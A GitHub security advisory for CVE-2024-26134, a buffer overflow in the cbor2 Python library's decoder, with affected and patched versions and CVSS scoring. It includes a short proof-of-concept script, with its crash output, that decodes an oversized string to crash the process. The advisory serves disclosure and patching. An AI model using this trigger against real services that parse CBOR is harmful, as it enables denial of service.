Skip to content

Potential buffer overflow in CBOR2 decoder

High severity GitHub Reviewed Published Feb 19, 2024 in agronholm/cbor2 • Updated Apr 20, 2024

Package

pip cbor2 (pip)

Affected versions

>= 5.5.1, < 5.6.2

Patched versions

5.6.2

Description

Summary

Ever since agronholm/cbor2#204 (or specifically agronholm/cbor2@387755e) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye aarm64 on a Raspberry Pi 3 (I was not able to reproduce this on my x86_64 Laptop with Python 3.11; I suspect because there is enough memory to allocate still)

Details

PoC

import json
import concurrent.futures
import cbor2

def test():
    obj = "x" * 131128
    cbor_enc = cbor2.dumps(obj)
    return cbor2.loads(cbor_enc)

with concurrent.futures.ProcessPoolExecutor() as executor:
    future = executor.submit(test)
    print(future.result())
malloc(): unsorted double linked list corrupted
Traceback (most recent call last):
  File "test.py", line 14, in <module>
    print(future.result())
  File "/usr/lib/python3.9/concurrent/futures/_base.py", line 440, in result
    return self.__get_result()
  File "/usr/lib/python3.9/concurrent/futures/_base.py", line 389, in __get_result
    raise self._exception
concurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.

If one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow.

import json
import cbor2

def test():
    obj = "x" * 131128
    cbor_enc = cbor2.dumps(obj)
    return cbor2.loads(cbor_enc)

print(test())
Traceback (most recent call last):
  File "test.py", line 12, in <module>
    print(test())
  File "test.py", line 9, in test
    return cbor2.loads(cbor_enc)
SystemError: <built-in function loads> returned NULL without setting an error

Impact

An attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.

References

@agronholm agronholm published to agronholm/cbor2 Feb 19, 2024
Published by the National Vulnerability Database Feb 19, 2024
Published to the GitHub Advisory Database Feb 21, 2024
Reviewed Feb 21, 2024
Last updated Apr 20, 2024

Severity

High
7.5
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Weaknesses

CVE ID

CVE-2024-26134

GHSA ID

GHSA-375g-39jq-vq7m

Source code

Credits

Checking history
See something to contribute? Suggest improvements for this vulnerability.